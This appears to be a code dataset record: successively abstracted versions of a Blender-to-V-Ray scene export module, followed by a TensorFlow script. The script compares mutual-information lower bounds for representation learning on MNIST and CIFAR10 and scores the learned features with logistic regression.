o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return 
err\n\n\ndef ExportAndRun(engine, scene):\n if engine.test_break():\n return 'Export is interrupted!'\n VRayScene = scene.vray\n o = VRayPluginExporter()\n bus = {'output': o, 'engine': engine, 'scene': scene, 'camera': scene.\n camera, 'skipObjects': set(), 'environment_volume': set(), 'gizmos':\n set(), 'preview': engine.is_preview, 'context': {'node': None},\n 'cache': {'plugins': set(), 'mesh': set()}, 'defaults': {'brdf':\n 'BRDFNOBRDFISSET', 'material': 'MANOMATERIALISSET', 'texture':\n 'TENOTEXTUREIESSET', 'uvwgen': 'DEFAULTUVWC', 'blend':\n 'TEDefaultBlend'}}\n if bus['camera'].type != 'CAMERA':\n return \"Scene's active camera is not of type camera\"\n err = ExportEx(bus)\n if err is not None:\n return err\n err = exp_run.RunEx(bus)\n if err is not None:\n return err\n return None\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return 
err\n\n\n<function token>\n\n\ndef RenderScene(engine, scene):\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n err = None\n if VRayExporter.animation_mode == 'FRAMEBYFRAME':\n selected_frame = scene.frame_current\n f = scene.frame_start\n while f <= scene.frame_end:\n scene.frame_set(f)\n err = ExportAndRun(engine, scene)\n if err is not None:\n break\n f += scene.frame_step\n scene.frame_set(selected_frame)\n else:\n err = ExportAndRun(engine, scene)\n return err\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\ndef ExportEx(bus):\n debug.Debug('ExportEx()')\n err = None\n scene = bus['scene']\n engine = bus['engine']\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n pm = VRayFilePaths()\n pm.setSeparateFiles(VRayExporter.useSeparateFiles)\n pm.initFromScene(engine, scene)\n pm.printInfo()\n fm = VRayExportFiles(pm)\n fm.setOverwriteGeometry(VRayExporter.auto_meshes)\n rtExporter = HAS_VB35 and engine.bl_idname == 'VRAY_RENDER_RT'\n try:\n fm.init(not rtExporter)\n except Exception as e:\n debug.ExceptionInfo(e)\n return 'Error initing files!'\n o.setFileManager(fm)\n o.setPreview(engine.is_preview)\n if not rtExporter:\n bus['exporter'] = exp_init.InitExporter(bus)\n try:\n if not rtExporter:\n err = Export(bus, scene, engine, engine.is_preview)\n else:\n if not VRayExporter.animation_mode in {'NONE', 'CAMERA_LOOP'}:\n o.setAnimation(True)\n o.setFrameStart(scene.frame_start)\n o.setFrameEnd(scene.frame_end)\n o.setFrameStep(scene.frame_step)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n cameraCount = len([(1) for o in scene.objects if o.type ==\n 'CAMERA' and o.data.vray.use_camera_loop])\n o.setAnimation(True)\n o.setFrameStart(1)\n o.setFrameEnd(cameraCount)\n o.setFrameStep(1)\n init = {'context': bpy.context.as_pointer(), 'engine': engine.\n as_pointer(), 'data': bpy.data.as_pointer(), 'scene': scene\n .as_pointer(), 'mainFile': fm.getFilePathByPluginType(\n 'MAIN'), 'objectFile': fm.getFilePathByPluginType('OBJECT'),\n 'envFile': fm.getFilePathByPluginType('WORLD'),\n 'geometryFile': fm.getFilePathByPluginType('GEOMETRY'),\n 'lightsFile': fm.getFilePathByPluginType('LIGHT'),\n 'materialFile': fm.getFilePathByPluginType('MATERIAL'),\n 'textureFile': fm.getFilePathByPluginType('TEXTURE'),\n 'cameraFile': fm.getFilePathByPluginType('CAMERA')}\n if engine.renderer:\n del engine.renderer\n renderer = _vray_for_blender_rt.init(**init)\n if renderer:\n setattr(engine, 'renderer', renderer)\n _vray_for_blender_rt.render(renderer)\n except Exception as e:\n debug.ExceptionInfo(e)\n err = str(e)\n finally:\n exp_init.ShutdownExporter(bus)\n return 
err\n\n\n<function token>\n<function token>\n",
"<import token>\n<assignment token>\n<code token>\n\n\[email protected]\ndef Export(bus, scene, engine, isPreview=False):\n o = bus['output']\n VRayScene = scene.vray\n VRayExporter = VRayScene.Exporter\n ts = time.time()\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('defaults.vrscene'))\n if VRayExporter.draft:\n o.write('MAIN', '\\n')\n o.write('MAIN', SysUtils.GetVRsceneTemplate('draft.vrscene'))\n exp_channels.ExportRenderElements(bus)\n if VRayExporter.animation_mode in {'FRAMEBYFRAME', 'NONE'}:\n err = exp_frame.ExportSingleFrame(bus)\n elif VRayExporter.animation_mode == 'CAMERA_LOOP':\n err = exp_anim_camera_loop.ExportCameraLoop(bus)\n else:\n err = exp_anim_full.ExportAnimation(bus, scene.frame_start, scene.\n frame_end, scene.frame_step)\n if VRayScene.Includer.use:\n if VRayScene.Includer.use:\n o.write('MAIN', '\\n// Include additional *.vrscene files')\n for includeFile in VRayScene.Includer.nodes:\n if not includeFile.use:\n continue\n filepath = BlenderUtils.GetFullFilepath(includeFile.scene)\n o.write('MAIN', '\\n#include \"%s\" // %s' % (filepath,\n includeFile.name))\n o.write('MAIN', '\\n')\n o.setAnimation(False)\n exp_settings.ExportSettings(bus)\n te = time.time() - ts\n td = datetime.timedelta(seconds=te)\n d = datetime.datetime(1, 1, 1) + td\n if not bus['preview']:\n debug.PrintMsg('Export done [%.2i:%.2i:%.2i]' % (d.hour, d.minute,\n d.second))\n return err\n\n\n<function token>\n<function token>\n<function token>\n",
"<import token>\n<assignment token>\n<code token>\n<function token>\n<function token>\n<function token>\n<function token>\n"
] | false |
99,822 | f2ce68146ed6eed776f9e0c0e18e9109ceccbd3c | import csv
import re
import sys
from sys import argv, exit
import itertools
# if len(argv) != 2:
# print("Usage: python dna.py data.csv")
# exit(1)
# house=argv[1]
house='Slytherin'
import sqlite3
conn = sqlite3.connect('students.db')
c = conn.cursor()
for row in c.execute('SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first', (house,)):
    # A missing middle name is a SQL NULL (returned to Python as None); also accept a
    # literal 'NULL' string in case the import stored it as text.
    if row[1] is None or row[1] == 'NULL':
        print(f"{row[0]} {row[2]}, born {row[4]}")
    else:
        print(f"{row[0]} {row[1]} {row[2]}, born {row[4]}")
conn.close()
| [
"import csv\nimport re\nimport sys\nfrom sys import argv, exit\nimport itertools\n\n# if len(argv) != 2:\n# print(\"Usage: python dna.py data.csv\")\n# exit(1)\n# house=argv[1]\n\nhouse='Slytherin'\n\nimport sqlite3\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\n\nfor row in c.execute('SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first',(house,)):\n if row[1]=='NULL':\n print(row[0],row[2],', born',row[4])\n else:\n print(row[0],row[1],row[2],', born',row[4])\n \n\n",
"import csv\nimport re\nimport sys\nfrom sys import argv, exit\nimport itertools\nhouse = 'Slytherin'\nimport sqlite3\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\nhouse = 'Slytherin'\n<import token>\nconn = sqlite3.connect('students.db')\nc = conn.cursor()\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\n<assignment token>\n<import token>\n<assignment token>\nfor row in c.execute(\n 'SELECT first,middle,last,house,birth FROM students WHERE house=? ORDER BY last,first'\n , (house,)):\n if row[1] == 'NULL':\n print(row[0], row[2], ', born', row[4])\n else:\n print(row[0], row[1], row[2], ', born', row[4])\n",
"<import token>\n<assignment token>\n<import token>\n<assignment token>\n<code token>\n"
] | false |
99,823 | e6b257f5af60bfeec69f960de76485c576941515 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# reference links:
# From https://colab.research.google.com/github/google-research/google-research/blob/master/vbmi/vbmi_demo.ipynb
# https://github.com/google-research/google-research/blob/master/mutual_information_representation_learning/mirl.ipynb
# https://github.com/yaohungt/Pointwise_Dependency_Neural_Estimation/tree/master/RepreLearn_Shallow
from __future__ import division
from __future__ import print_function
import collections
import copy
import functools
import itertools
import os
import pickle
import argparse
from matplotlib import pyplot as plt
from matplotlib.ticker import FuncFormatter
import numpy as np
import pandas as pd
from scipy.ndimage import gaussian_filter1d
import seaborn as sns
import tensorflow as tf
from tensorflow.python.ops.parallel_for import gradients
import tensorflow_datasets as tfds
import tensorflow_probability as tfp
import sklearn.linear_model as sk_linear
parser = argparse.ArgumentParser(description='Representation Learning Experiments')
parser.add_argument('--dataset', default='mnist', type=str,
help='cifar10 or mnist')
parser.add_argument('--lr', default=1e-4, type=float,
help='learning rate')
parser.add_argument('--batch_size', default=100, type=int,
help='mini batch size')
parser.add_argument('--smoothing', default=0.01, type=float,
help='label smoothing parameter')
parser.add_argument('--output_dir', type=str, default='./runs',
help='directory where the results will be stored')
args = parser.parse_args()
a, b, c = 0.005, 0.1, 0.9
if not os.path.isdir(args.output_dir):
os.mkdir(args.output_dir)
# Learning rate: for our method on CIFAR10 use 1e-4; otherwise it is taken from the --lr flag via LEARNING_RATE below.
TFDS_NAME = args.dataset #"cifar10" # mnist or cifar10
NRUNS = 10 #@param { type: "slider", min: 1, max: 20, step: 1}
# parameters for training
if TFDS_NAME == "mnist":
    DIMS = 784
elif TFDS_NAME == "cifar10":
    DIMS = 3072
else:
    raise ValueError("Unsupported --dataset '{}'; expected 'mnist' or 'cifar10'.".format(TFDS_NAME))
LEARNING_RATE = args.lr #1e-5
N_CLASSES = 10
TRAIN_BATCH_SIZE = args.batch_size #64 #@param { type: "slider", min: 64, max: 128, step: 64}
# save results
# RESULT_DIR = '{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)
RESULT_DIR = './runs/{}_nrun={}_lr={}_batch={}.pkl'.format(TFDS_NAME, NRUNS, LEARNING_RATE, TRAIN_BATCH_SIZE)
RUN_EXPERIMENTS = True
FEATURE_INPUT = "image"
FEATURE_LABEL = "label"
#slim = tf.contrib.slim
tfb = tfp.bijectors
tfd = tfp.distributions
tfkl = tf.keras.layers
tf.keras.backend.clear_session()
ResultsConfig = collections.namedtuple(
"ResultsConfig", ["nets", "critic", "loss"])
Results = collections.namedtuple(
'Results',
['iterations', 'training_losses', 'testing_losses',
'classification_accuracies', 'singular_values'])
ResultsAdversarial = collections.namedtuple(
"ResultsAdversarial",
["losses_e", "losses_c", "classification_accuracies", "iters"]
)
ResultsSamplingIssues = collections.namedtuple(
"ResultsSamplingIssues", ["mi_true", "nce_estimates_noniid",
"nce_estimates_iid", "nwj_estimates_noniid",
"nwj_estimates_iid"])
def acti_func(x, a, b, c):
    # Piecewise-linear schedule for the adaptive smoothing weight alpha(x):
    # alpha = a at x = 0, decays linearly to 0 at x = b, stays 0 on (b, c),
    # then rises linearly back to a at x = 1.
    x = tf.stop_gradient(x)
    alpha = tf.zeros_like(x)
    alpha = tf.where(x <= b, -a * x / b + a, alpha)
    alpha = tf.where((x > b) & (x < c), 0., alpha)
    alpha = tf.where(x >= c, a * x / (1 - c) + a * c / (c - 1), alpha)
    return alpha
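# Illustrative sketch (ours; not called anywhere in the pipeline): probing acti_func at a
# few arbitrary points makes its "high at the extremes, zero in the middle" shape easy to
# see. The helper name and probe values are ours, not part of the original experiments.
def _demo_acti_func():
    probe = tf.constant([0.0, 0.05, b, 0.5, c, 0.95, 1.0])
    print(acti_func(probe, a, b, c))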
def convert_to_data_frame(result, exp_name, nets, critic, loss, seed):
"""Convert results class to a data frame."""
label = "{}, {}, {}".format(nets, critic, loss)
rows = list(
zip(
itertools.repeat(exp_name),
itertools.repeat(nets),
itertools.repeat(critic),
itertools.repeat(loss),
itertools.repeat(seed),
result.iterations,
[-loss for loss in result.testing_losses], # Loss -> bound.
result.classification_accuracies,
itertools.repeat(label)))
df_eval = pd.DataFrame(
rows,
columns=("exp_name", "nets", "Critic", "Estimator",
"run", "iteration", "bound_value", "accuracy", "label"))
df_eval["Estimator"] = df_eval["Estimator"].replace(
to_replace={
"cpc": "$CPC$",
"pcc": "$PCC$",
"drfc": "$D-RFC$",
"wpc": "$WPC$"
})
df_eval["Critic"] = df_eval["Critic"].replace(
to_replace={
"concat": "MLP",
"separable": "Separable",
"innerprod": "Inner product",
"bilinear": "Bilinear"
})
return df_eval
def apply_default_style(ax):
ax.set_xlim([0, 20001])
ax.get_xaxis().set_major_formatter(
FuncFormatter(lambda x, p: format(int(x/1000), ',')))
ax.set_xlabel("Training steps (in thousands)")
plt.tick_params(top=False, right=False, bottom=False, left=False)
handles, labels = ax.get_legend_handles_labels()
plt.legend(loc="lower right", handles=handles[1:], labels=labels[1:])
def get_testing_loss(x_array, session, loss, data_ph, dims, batch_size=512):
total_loss = 0
for i in range(0, x_array.shape[0], batch_size):
x_slice = x_array[i:i+batch_size, :dims]
total_loss += x_slice.shape[0] * session.run(loss,
feed_dict={data_ph: x_slice})
return total_loss / x_array.shape[0]
def get_classification_accuracy(session, codes, data_ph, dims):
x_train_mapped = map_data(x_train, session, codes, data_ph, dims)
x_test_mapped = map_data(x_test, session, codes, data_ph, dims)
accuracy = logistic_fit(x_train_mapped, y_train, x_test_mapped, y_test)
return accuracy
def map_data(x_array, session, codes, data_ph, dims, batch_size=512):
x_mapped = []
for i in range(0, x_array.shape[0], batch_size):
x_mapped.append(
session.run(codes,
feed_dict={data_ph: x_array[i:i+batch_size, :dims]}))
return np.concatenate(x_mapped, axis=0)
def reduce_logmeanexp_nodiag(x, axis=None):
batch_size = x.shape[0]
logsumexp = tf.reduce_logsumexp(input_tensor=x - tf.linalg.tensor_diag(np.inf * tf.ones(batch_size)), axis=axis)
if axis:
num_elem = batch_size - 1.
else:
num_elem = batch_size * (batch_size - 1.)
return logsumexp - tf.math.log(num_elem)
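# Sanity-check sketch (ours; never invoked): reduce_logmeanexp_nodiag should match a direct
# numpy log-mean-exp over the off-diagonal entries. Matrix size and values are arbitrary.
def _demo_reduce_logmeanexp_nodiag():
    scores = np.random.randn(5, 5).astype(np.float32)
    expected = np.log(np.mean(np.exp(scores[~np.eye(5, dtype=bool)])))
    print(float(reduce_logmeanexp_nodiag(tf.constant(scores))), expected)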
def tuba_lower_bound(scores, log_baseline=None):
if log_baseline is not None:
scores -= log_baseline[:, None]
batch_size = tf.cast(scores.shape[0], tf.float32)
# First term is an expectation over samples from the joint,
    # which are the diagonal elements of the scores matrix.
joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))
# Second term is an expectation over samples from the marginal,
# which are the off-diagonal elements of the scores matrix.
marg_term = tf.exp(reduce_logmeanexp_nodiag(scores))
return 1. + joint_term - marg_term
def nwj_lower_bound(scores):
# equivalent to: tuba_lower_bound(scores, log_baseline=1.)
return tuba_lower_bound(scores - 1.)
@tf.function
def js_fgan_lower_bound(f):
"""Lower bound on Jensen-Shannon divergence from Nowozin et al. (2016)."""
f_diag = tf.linalg.tensor_diag_part(f)
first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))
n = tf.cast(f.shape[0], tf.float32)
second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))
return first_term - second_term
@tf.function
def infonce_lower_bound(scores):
"""InfoNCE lower bound from van den Oord et al. (2018)."""
nll = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores) - tf.reduce_logsumexp(input_tensor=scores, axis=1))
mi = tf.math.log(tf.cast(scores.shape[0], tf.float32)) + nll
return mi
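# Quick sketch (ours; never invoked): InfoNCE evaluated on a random critic matrix illustrates
# that the estimate is capped at log(batch_size), which is why high-MI settings saturate.
def _demo_infonce_cap(batch_size=64):
    scores = tf.random.normal([batch_size, batch_size])
    print(float(infonce_lower_bound(scores)), np.log(batch_size))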
@tf.function
def our_lower_bound(scores):
    # scores: a [batch_size, batch_size] critic score matrix (e.g. 128 x 128).
"""Our lower bound"""
batch_size = tf.cast(scores.shape[0], tf.float32)
joint_term = tf.reduce_mean(input_tensor=tf.linalg.diag_part(scores))
# expectation
scores_sq = scores**2
marg_num = batch_size * (batch_size - 1.)
marg_term = tf.reduce_sum(input_tensor=scores_sq) - tf.reduce_sum(input_tensor=tf.linalg.diag_part(scores_sq))
marg_term = marg_term / marg_num
# tf.print(joint_term - 0.5*marg_term)
return joint_term - 0.5*marg_term
# nll = tf.reduce_mean(tf.linalg.diag_part(scores) - 0.5 * tf.math.reduce_euclidean_norm(scores, axis=1))
# tf.print(nll)
# mi = tf.math.log(tf.cast(scores.shape[0].value, tf.float32)) + nll
# return mi
@tf.function
def skew_js_fgan_lower_bound(f):
"""skewed js lower bound (true cross entropy)"""
n = tf.cast(f.shape[0], tf.float32)
alpha = 1/n
f_diag = tf.linalg.tensor_diag_part(f)
first_term = tf.reduce_mean(-tf.nn.softplus(-f_diag))
second_term = (tf.reduce_sum(tf.nn.softplus(f)) - tf.reduce_sum(tf.nn.softplus(f_diag))) / (n * (n - 1.))
return alpha*first_term - (1-alpha)*second_term
@tf.function
def label_smooth_pcc(f):
""" pcc with label smoothing trick"""
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
@tf.function
def predict_smooth_pcc(f):
""" pcc with predictor smoothing trick"""
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
pre_prob = (1.0 - args.smoothing) * pre_prob + args.smoothing / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
@tf.function
def adap_label_smooth_pcc(f):
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
alpha = acti_func(pre_prob, a, b, c)
new_labels = (1.0 - alpha) * labels + alpha / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(new_labels, pre_prob)
@tf.function
def adap_pred_smooth_pcc(f):
n = f.shape[0]
labels = tf.eye(n)
labels = tf.reshape(labels,[-1,1])
# labels = (1.0 - args.smoothing) * labels + args.smoothing / 2
pre_prob = tf.reshape(tf.sigmoid(f), [-1,1])
# print('pre_prob:',pre_prob)
alpha = acti_func(pre_prob, a, b, c)
pre_prob = (1.0 - alpha) * pre_prob + alpha / 2
bce = tf.keras.losses.BinaryCrossentropy()
return -bce(labels, pre_prob)
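# Side-by-side sketch (ours; never invoked): the smoothed objectives above differ only in how
# the binary cross-entropy targets or predictions are softened, so evaluating them on one
# random score matrix makes the variants easy to compare. Absolute scales differ from the
# plain JS bound because the BCE-based losses average over all batch_size**2 pairs.
def _demo_pcc_variants(batch_size=16):
    f = tf.random.normal([batch_size, batch_size])
    for name, fn in [("pcc (js)", js_fgan_lower_bound),
                     ("label_smooth", label_smooth_pcc),
                     ("predict_smooth", predict_smooth_pcc),
                     ("adap_label", adap_label_smooth_pcc),
                     ("adap_pred", adap_pred_smooth_pcc)]:
        print(name, float(fn(f)))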
# @title Define the linear evaluation protocol { display-mode: "form" }
def logistic_fit(x_train, y_train, x_test, y_test):
logistic_regressor = sk_linear.LogisticRegression(
solver='saga', multi_class='multinomial', tol=.1, C=10.)
from sklearn.preprocessing import MinMaxScaler
scaler = MinMaxScaler()
x_train = scaler.fit_transform(x_train)
x_test = scaler.transform(x_test)
logistic_regressor.fit(x_train, y_train.ravel())
return logistic_regressor.score(x_test, y_test.ravel())
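# Minimal usage sketch (ours; never invoked): logistic_fit is the linear-evaluation protocol,
# so any (features, labels) arrays with matching first dimensions work. The synthetic blobs
# below only illustrate the call signature; they are not part of the experiments.
def _demo_logistic_fit():
    rng = np.random.RandomState(0)
    x_all = np.concatenate([rng.randn(200, 8) + 2.0, rng.randn(200, 8) - 2.0], axis=0)
    y_all = np.concatenate([np.zeros(200), np.ones(200)])
    perm = rng.permutation(400)
    x_all, y_all = x_all[perm], y_all[perm]
    print(logistic_fit(x_all[:300], y_all[:300], x_all[300:], y_all[300:]))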
# @title Define and load the dataset, check baseline in pixel space { display-mode: "form" }
tf.compat.v1.reset_default_graph()
def map_fn(example):
image = example[FEATURE_INPUT]
image = tf.cast(image, tf.float32) / 255.0
image = tf.reshape(image, [-1]) # Flatten.
label = example[FEATURE_LABEL]
return {FEATURE_INPUT: image, FEATURE_LABEL: label}
def load_data(split):
return (tfds.load(TFDS_NAME, data_dir='/public/wangxu/data/', split=split)
.cache()
.map(map_func=map_fn)
.shuffle(1000))
def tfds_to_np(dataset):
features = list(tfds.as_numpy(dataset))
images = np.stack([f[FEATURE_INPUT].ravel() for f in features])
labels = np.stack([f[FEATURE_LABEL].ravel() for f in features])
return images, labels
dataset_train = load_data("train")
dataset_test = load_data("test")
x_train, y_train = tfds_to_np(dataset_train)
x_test, y_test = tfds_to_np(dataset_test)
tf.compat.v1.reset_default_graph()
x_train_noisy = x_train + 0.05 * np.random.randn(*x_train.shape)
x_test_noisy = x_test + 0.05 * np.random.randn(*x_test.shape)
print("Fit on half the pixels: {}. It should be around 0.835.".format(
logistic_fit(x_train_noisy[:, :DIMS//2], y_train,
x_test_noisy[:, :DIMS//2], y_test)))
def processed_train_data(dims, batch_size):
dataset = load_data("train")
dataset_batched = dataset.repeat().batch(batch_size, drop_remainder=True)
get_next = tf.compat.v1.data.make_one_shot_iterator(dataset_batched).get_next()
features = get_next[FEATURE_INPUT]
labels = get_next[FEATURE_LABEL]
    # Split each flattened image into the first dims pixels and the remaining DIMS - dims
    # pixels (the original "Martin" note flagged this step as where the problem occurs).
x_1, x_2 = tf.split(features, [dims, DIMS-dims], axis=-1)
return x_1, x_2, labels
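# Sketch of the two-view construction used above (ours; never invoked): each flattened image
# is cut into its first `dims` pixels (x_1) and the remaining DIMS - dims pixels (x_2), and
# the two halves act as the paired views whose mutual information is estimated. The dummy
# batch below only illustrates the resulting shapes.
def _demo_two_view_split(batch_size=4, dims=DIMS // 2):
    dummy_images = tf.random.uniform([batch_size, DIMS])
    x_1, x_2 = tf.split(dummy_images, [dims, DIMS - dims], axis=-1)
    print(x_1.shape, x_2.shape)  # (batch_size, dims) and (batch_size, DIMS - dims)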
class MLP(tf.keras.Model):
def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):
super(MLP, self).__init__()
self._layers = [tfkl.Dense(dimensions, **dense_kwargs)
for dimensions in layer_dimensions[:-1]]
dense_kwargs_copy = copy.deepcopy(dense_kwargs)
dense_kwargs_copy["activation"] = None
